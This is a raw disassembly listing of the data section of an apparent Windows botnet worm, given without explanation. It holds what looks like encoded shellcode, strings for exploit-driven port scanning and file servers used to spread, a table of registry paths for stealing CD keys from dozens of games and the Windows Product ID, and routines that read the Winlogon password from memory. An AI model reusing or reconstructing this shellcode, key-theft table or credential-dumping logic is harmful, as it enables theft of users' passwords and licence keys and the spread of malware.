dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h
dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h
dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h
dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh
dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h
dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h
dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh
dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h
dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh
dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh
dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh
dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h
dd 0FAF899F7h, 0EDE9FCFAh, 99h
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_405756+82�o
align 10h
aSD db ' %s: %d,',0 ; DATA XREF: sub_405756+42�o
align 4
unk_42684C db 2 ; DATA XREF: sub_405756+11�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aExploitStatist db ' Exploit Statistics:',0
align 10h
unk_426880 db 2 ; DATA XREF: sub_405821+42�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aScanNotActive_ db ' Scan not active.',0
unk_4268B0 db 2 ; DATA XREF: sub_405821+2C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCurrentIpS_ db ' Current IP: %s.',0
align 10h
unk_4268E0 db 2 ; DATA XREF: sub_405898+36F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStartS db 'Failed to start server, error: <%d>.',0
align 4
unk_426924 db 2 ; DATA XREF: sub_405898+307�o
; sub_40D2E0+54B9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aServerListenin db 'Server listening on IP: %s:%d, Directory: %s\.',0
align 10h
dword_426970 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_405898+267�o
dd 2BBBB02h
aFailedToStar_0 db ' Failed to start server, error: <%d>.',0
align 10h
dword_4269B0 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_405898+1FA�o
dd 2BBBB02h
aServerStartedO db ' Server started on Port: %d, File: %s, Request: %s.',0
align 10h
unk_426A00 db 2 ; DATA XREF: sub_405898+149�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_1 db ' Failed to start server, error: <%d>.',0
unk_426A40 db 2 ; DATA XREF: sub_405898+DB�o
; sub_40D2E0+5343�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aServerStarte_0 db ' Server started on Port: %d, File: %s, Request: %s.',0
align 10h
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_405C74+38�o
; sub_409526+46�o
unk_426A9C db 2 ; DATA XREF: sub_405DAD+EE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSPortDIsOpen db ' IP: %s, Port %d is open.',0
unk_426AD4 db 2 ; DATA XREF: sub_405DAD+93�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSDScanThread db ' IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 10h
unk_426B20 db 2 ; DATA XREF: sub_405FC5+1CE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFinishedAtSDAf db ' Finished at %s:%d after %d minute(s) of scanning.',0
align 4
unk_426B74 db 2 ; DATA XREF: sub_405FC5+173�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_2 db ' Failed to start worker thread, error: <%d>.',0
align 10h
unk_426BC0 db 2 ; DATA XREF: sub_405FC5+103�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDScanThreadDS db ' %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 4
unk_426C08 db 2 ; DATA XREF: sub_405FC5+87�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToInitia db ' Failed to initialize critical section.',0
align 10h
unk_426C50 db 2 ; DATA XREF: sub_406224+156�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartC db ' Failed to start client thread, error: <%d>.',0
unk_426C9C db 2 ; DATA XREF: sub_406224+E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientConnecti db ' Client connection from IP: %s:%d, Server thread: %d.',0
align 4
unk_426CF4 db 2 ; DATA XREF: sub_4063AC+1AA�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_3 db ' Failed to start connection thread, error: <%d>.',0
unk_426D44 db 2 ; DATA XREF: sub_4063AC+E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientConnec_0 db ' Client connection to IP: %s:%d, Server thread: %d.',0
align 4
unk_426D98 db 2 ; DATA XREF: sub_406630+1B2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStar_4 db 'Failed to start server on Port %d.',0
align 4
unk_426DD8 db 2 ; DATA XREF: sub_406630+18F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStar_5 db 'Failed to start client thread, error: <%d>.',0
unk_426E20 db 2 ; DATA XREF: sub_406630+114�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aClientConnec_1 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 4
unk_426E74 db 2 ; DATA XREF: sub_406630+A8�o
; sub_40D2E0+5E22�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aServerStarte_1 db 'Server started on: %s:%d.',0
align 4
unk_426EAC db 2 ; DATA XREF: sub_406835+1F9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorFailedToC db 'Error: Failed to connect to target, returned: <%d>.',0
unk_426EFC db 2 ; DATA XREF: sub_406835+18A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorFailedToO db 'Error: Failed to open socket(), returned: <%d>.',0
unk_426F48 db 2 ; DATA XREF: sub_406835+F2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aAuthentication db 'Authentication failed. Remote userid: %s != %s.',0
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_406BF9+11�o
aWindow db 'Window',0 ; DATA XREF: sub_406E34+23�o
; sub_40702D+26�o
align 8
dd 80000001h
off_426FAC dd offset aSoftwareValveC ; DATA XREF: sub_40726C+C�r
; sub_40726C+21�o
; "Software\\Valve\\CounterStrike\\Settings"
dd offset aCdkey ; "CDKey"
dd offset aCounterStrikeR ; "Counter-Strike (Retail)"
dword_426FB8 dd 2 dup(0) ; DATA XREF: sub_40726C+26�o
dd 80000001h, 428140h, 428134h, 428124h, 2 dup(0)
dd 80000001h, 428104h, 428100h, 4280ECh, 2 dup(0)
dd 80000001h, 4280C8h, 428100h, 4280BCh, 2 dup(0)
dd 80000001h, 428098h, 428090h, 42807Ch, 2 dup(0)
dd 80000001h, 428068h, 428058h, 42803Ch, 2 dup(0)
dd 80000001h, 427FF8h, 428180h, 427FE4h, 2 dup(0)
dd 80000002h, 427FB8h, 427FACh, 427F8Ch, 2 dup(0)
dd 80000002h, 427F58h, 428180h, 427F40h, 2 dup(0)
dd 80000002h, 427F0Ch, 428180h, 427EF4h, 2 dup(0)
dd 80000002h, 427EDCh, 428180h, 427EC4h, 2 dup(0)
dd 80000002h, 427E88h, 4325D8h, 427E78h, 2 dup(0)
dd 80000002h, 427E40h, 4325D8h, 427E2Ch, 2 dup(0)
dd 80000002h, 427DE0h, 4325D8h, 427DC0h, 2 dup(0)
dd 80000002h, 427D70h, 4325D8h, 427D44h, 2 dup(0)
dd 80000002h, 427D08h, 4325D8h, 427CF4h, 2 dup(0)
dd 80000002h, 427CBCh, 4325D8h, 427CACh, 2 dup(0)
dd 80000002h, 427C5Ch, 4325D8h, 427C30h, 2 dup(0)
dd 80000002h, 427BF0h, 4325D8h, 427BD4h, 2 dup(0)
dd 80000002h, 427BA4h, 4325D8h, 427B84h, 2 dup(0)
dd 80000002h, 427B48h, 4325D8h, 427B34h, 2 dup(0)
dd 80000002h, 427AECh, 4325D8h, 427ACCh, 2 dup(0)
dd 80000002h, 427A78h, 4325D8h, 427A48h, 2 dup(0)
dd 80000002h, 4279F8h, 4325D8h, 4279CCh, 2 dup(0)
dd 80000002h, 42798Ch, 427984h, 427964h, 2 dup(0)
dd 80000002h, 427920h, 4325D8h, 427904h, 2 dup(0)
dd 80000002h, 4278B8h, 4325D8h, 427894h, 2 dup(0)
dd 80000002h, 427860h, 4325D8h, 427854h, 2 dup(0)
dd 80000002h, 427820h, 4325D8h, 427814h, 2 dup(0)
dd 80000002h, 4277E0h, 4325D8h, 4277D4h, 2 dup(0)
dd 80000002h, 4277A0h, 4325D8h, 427794h, 2 dup(0)
dd 80000002h, 427758h, 4325D8h, 427744h, 2 dup(0)
dd 80000002h, 427708h, 4325D8h, 4276F4h, 2 dup(0)
dd 80000002h, 4276C4h, 428180h, 4276A8h, 2 dup(0)
dd 80000002h, 427688h, 427680h, 42765Ch, 2 dup(0)
dd 80000002h, 427640h, 427680h, 427620h, 2 dup(0)
dd 80000002h, 427600h, 427680h, 4275DCh, 2 dup(0)
dd 80000002h, 4275C4h, 427680h, 4275C0h, 2 dup(0)
dd 80000002h, 4275A4h, 427594h, 42758Ch, 2 dup(0)
dd 80000002h, 427558h, 427554h, 42753Ch, 2 dup(0)
dd 80000002h, 427500h, 4274F4h, 4274CCh, 4274BCh, 4274A8h
dd 80000002h, 427484h, 427478h, 427464h, 427454h, 42744Ch
dd 80000002h, 427484h, 427478h, 427420h, 427454h, 427418h
dd 80000002h, 427484h, 427478h, 4273E8h, 427454h, 4273E0h
dd 6 dup(0)
dd 3379654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64726F48h, 6F207365h, 68742066h, 6E552065h
dd 64726564h, 296B7261h, 0
dd 3279654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64616853h, 2073776Fh, 5520666Fh, 6572646Eh
dd 6469746Eh, 2965h, 3179654Bh, 3Dh, 636E776Eh, 79656B64h
dd 696E692Eh, 0
aNeverwinterNig db 'Neverwinter Nights',0
align 4
aLocation db 'Location',0
align 4
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0
align 4
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0
align 4
aBaseMpSof2key db 'base\mp\sof2key',0
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0
align 4
aInstallpath db 'InstallPath',0
db 53h
aOftwareActivis db 'oftware\Activision\Soldier of Fortune II - Double Helix',0
align 4
aHiddenDangerou db 'Hidden & Dangerous 2',0
align 4
aKey db 'key',0
db 53h
aOftwareIllusio db 'oftware\Illusion Softworks\Hidden & Dangerous 2',0
align 4
aChrome db 'Chrome',0
align 4
aSerialnumber db 'SerialNumber',0
align 4
db 53h
aOftwareTechlan db 'oftware\Techland\Chrome',0
align 10h
aNox db 'NOX',0
aSoftwareWestwo db 'Software\Westwood\NOX',0
align 4
aCommandAndConq db 'Command and Conquer: Red Alert 2',0
align 10h
db 53h
aOftwareWestwoo db 'oftware\Westwood\Red Alert 2',0
align 10h
aCommandAndCo_0 db 'Command and Conquer: Red Alert',0
align 10h
db 53h
aOftwareWestw_0 db 'oftware\Westwood\Red Alert',0
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0
align 10h
aSerial db 'Serial',0
align 4
db 53h
aOftwareWestw_1 db 'oftware\Westwood\Tiberian Sun',0
align 4
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0
db 53h
aOftwareRedStor db 'oftware\Red Storm Entertainment\RAVENSHIELD',0
align 4
aNascarRacing20 db 'Nascar Racing 2003',0
align 4
db 53h
aOftwareElectro db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
align 4
aNascarRacing_0 db 'Nascar Racing 2002',0
align 4
db 53h
aOftwareElect_0 db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
align 4
aNhl2003 db 'NHL 2003',0
align 10h
db 53h
aOftwareElect_1 db 'oftware\Electronic Arts\EA Sports\NHL 2003\ergc',0
align 4
aNhl2002 db 'NHL 2002',0
align 10h
db 53h
aOftwareElect_2 db 'oftware\Electronic Arts\EA Sports\NHL 2002\ergc',0
align 4
aFifa2003 db 'FIFA 2003',0
align 10h
db 53h
aOftwareElect_3 db 'oftware\Electronic Arts\EA Sports\FIFA 2003\ergc',0
align 4
aFifa2002 db 'FIFA 2002',0
align 10h
db 53h
aOftwareElect_4 db 'oftware\Electronic Arts\EA Sports\FIFA 2002\ergc',0
align 4
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0
align 4
db 53h
aOftwareElect_5 db 'oftware\Electronic Arts\EA GAMES\Shogun Total War - Warlord Editi'
db 'on\ergc',0
align 4
aNeedForSpeedUn db 'Need For Speed: Underground',0
db 53h
aOftwareElect_6 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Underground\ergc',0
align 4
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0
align 4
aErgc db 'ergc',0
align 4
db 53h
aOftwareElect_7 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
align 4
aMedalOfHonorAl db 'Medal of Honor: Allied Assault: Spearhead',0
align 4
db 53h
aOftwareElect_8 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Sp'
db 'earhead\ergc',0
align 4
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
align 4
db 53h
aOftwareElect_9 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Br'
db 'eakthrough\ergc',0
align 4
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault',0
align 4
db 53h
aOftwareElec_10 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\er'
db 'gc',0
align 4
aGlobalOperatio db 'Global Operations',0
align 4
db 53h
aOftwareElec_11 db 'oftware\Electronic Arts\EA GAMES\Global Operations\ergc',0
align 4
aCommandAndCo_2 db 'Command and Conquer: Generals',0
align 4
db 53h
aOftwareElec_12 db 'oftware\Electronic Arts\EA GAMES\Generals\ergc',0
aJamesBond007Ni db 'James Bond 007: Nightfire',0
align 10h
db 53h
aOftwareElec_13 db 'oftware\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
aCommandAndCo_3 db 'Command and Conquer: Generals (Zero Hour)',0
align 4
db 53h
aOftwareElec_14 db 'oftware\Electronic Arts\EA GAMES\Command and Conquer Generals Zer'
db 'o Hour\ergc',0
align 4
aBlackAndWhite db 'Black and White',0
db 53h
aOftwareElec_15 db 'oftware\Electronic Arts\EA GAMES\Black and White\ergc',0
align 4
aBattlefieldVie db 'Battlefield Vietnam',0
db 53h
aOftwareElec_16 db 'oftware\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
align 4
aBattlefield194 db 'Battlefield 1942 (Secret Weapons of WWII)',0
align 10h
db 53h
aOftwareElec_17 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons '
db 'of WWII\ergc',0
align 10h
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0
db 53h
aOftwareElec_18 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rom'
db 'e\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942',0
align 10h
db 53h
aOftwareElec_19 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
aFreedomForce db 'Freedom Force',0
align 4
db 53h
aOftwareElec_20 db 'oftware\Electronic Arts\EA Distribution\Freedom Force\ergc',0
aIgi2CovertStri db 'IGI 2: Covert Strike',0
align 4
db 53h
aOftwareIgi2Ret db 'oftware\IGI 2 Retail',0
align 4
aUnrealTourname db 'Unreal Tournament 2004',0
align 4
db 53h
aOftwareUnrealT db 'oftware\Unreal Technology\Installed Apps\UT2004',0
align 10h
aUnrealTourna_0 db 'Unreal Tournament 2003',0
align 4
db 53h
aOftwareUnrea_0 db 'oftware\Unreal Technology\Installed Apps\UT2003',0
align 4
aMicrosoftWindo db 'Microsoft Windows Product ID',0
align 4
aProductid db 'ProductId',0
align 4
db 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion',0
align 4
aSoldiersOfAnar db 'Soldiers Of Anarchy',0
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
align 4
aLegendsOfMight db 'Legends of Might and Magic',0
align 4
aCustomernumber db 'CustomerNumber',0
align 4
aSoftware3d0Sta db 'Software\3d0\Status',0
aIndustryGiant2 db 'Industry Giant 2',0
align 10h
aPrvkey db 'prvkey',0
align 4
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0
align 4
aHalfLife db 'Half-Life',0
align 4
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0
align 4
aGunmanChronicl db 'Gunman Chronicles',0
align 10h
aKey_0 db 'Key',0
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0
align 4
aTheGladiators db 'The Gladiators',0
align 4
aRegnumber db 'RegNumber',0
align 10h
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0
align 4
aCounterStrikeR db 'Counter-Strike (Retail)',0 ; DATA XREF: _2:00426FB4�o
aCdkey db 'CDKey',0 ; DATA XREF: _2:00426FB0�o
align 4
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: _2:off_426FAC�o
align 10h
asc_4281B0: ; DATA XREF: sub_40726C+E9�o
; sub_40726C+F4�o
unicode 0, <=>,0
aR: ; DATA XREF: sub_40726C+8F�o
; sub_40D2E0:loc_411AB1�o
unicode 0, <r>,0
aSS_3 db '%s\%s',0 ; DATA XREF: sub_40726C+7E�o
; sub_40752B+45�o ...
align 10h
aSCdKeyS_ db '%s CD Key: (%s).',0 ; DATA XREF: sub_40726C+2B�o
align 4
unk_4281D4 db 2 ; DATA XREF: sub_407410+C8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFilesFoundD_ db ' Files found: %d.',0
unk_428204 db 2 ; DATA XREF: sub_407410+5C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingForFi db ' Searching for file: %s.',0
align 4
aFoundSS db ' Found: %s\%s',0 ; DATA XREF: sub_40752B+107�o
align 4
aS_4 db '%s\*',0 ; DATA XREF: sub_40752B+1A�o
align 4
unk_428254 db 2 ; DATA XREF: sub_40767D:loc_4077F6�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToEnable db ' Failed to enable Debug Privilege.',0
align 4
unk_428298 db 2 ; DATA XREF: sub_40767D:loc_4077C9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToFindWi db ' Unable to find Winlogon Process ID.',0
unk_4282DC db 2 ; DATA XREF: sub_40767D:loc_4077C2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToFindTh db ' Unable to find the password in memory.',0
align 4
unk_428324 db 2 ; DATA XREF: sub_40767D+117�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLogo db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/(no password)).',0
align 4
aUserdomain: ; DATA XREF: sub_40767D+DC�o
unicode 0, <USERDOMAIN>,0
align 4
aUsername: ; DATA XREF: sub_40767D+CE�o
unicode 0, <USERNAME>,0
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_40767D+9A�o
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_40767D+8D�o
align 10h
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_40767D+80�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_40767D+73�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_40767D+68�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_40767D+55�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_40767D+40�o
; sub_40767D+161�o ...
align 4
unk_428478 db 2 ; DATA XREF: sub_40767D+35�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aOnlySupportedO db ' Only supported on Windows NT/2000.',0
align 4
aMsgina db 'MSGINA',0 ; DATA XREF: sub_40784F+13E�o
align 4
aNwgina db 'NWGINA',0 ; DATA XREF: sub_40784F+123�o
align 4
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_40784F+AF�o
align 4
unk_4284D8 db 2 ; DATA XREF: sub_407CB5+70�o
; sub_407D4C+C7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLo_0 db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/%S).',0
align 4
